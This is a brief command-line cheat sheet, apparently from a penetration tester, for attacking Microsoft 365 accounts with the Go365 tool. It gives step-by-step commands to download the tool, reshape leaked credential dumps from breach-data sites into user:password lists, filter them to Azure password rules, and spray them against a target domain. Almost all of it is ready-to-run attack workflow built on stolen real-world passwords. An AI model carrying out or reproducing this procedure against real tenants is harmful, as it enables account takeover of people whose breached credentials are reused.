#
Go365
A tool for attacking O365 users with password stuffing/spraying.
#
Install
wget https://github.com/optiv/Go365/releases/download/v2.0/Go365_2.0_Linux_x86_64.tar.gz
tar -xzvf Go365_2.0_Linux_x86_64.tar.gz
#
Massage a CSV into a format Go365 can use
The example below works for a CSV extracted from sysleaks.com:
cut -d',' -f2,3 YOURCSV.csv | tr ',' ':' | sort -t':' -k1 | uniq > filtered.csv
#
Then take THAT CSV and filter it even further so it meets Azure requirements
Which are:
- Minimum of 8 characters
- 3 of these 4 properties:
- Uppercase letters
- Lowercase letters
- Numbers
- Symbols
awk -F: '{
pass=$2;
classes=0;
if (pass ~ /[a-z]/) classes++;
if (pass ~ /[A-Z]/) classes++;
if (pass ~ /[0-9]/) classes++;
if (pass ~ /[^a-zA-Z0-9]/) classes++;
if (length(pass) >= 8 && classes >= 3) print $0
}' filtered.csv > superfiltered.txt
#
Spray a list of usernames and passwords against M365/Azure/whatever-they're-calling-it-this-week
./Go365 -endpoint graph -up UP.txt -debug -w 300 -o CLIENT_output.txt -d domain.com
The UP.txt
would be a "users and passwords" file that you'd generate by some other means, such as a dehashed dump.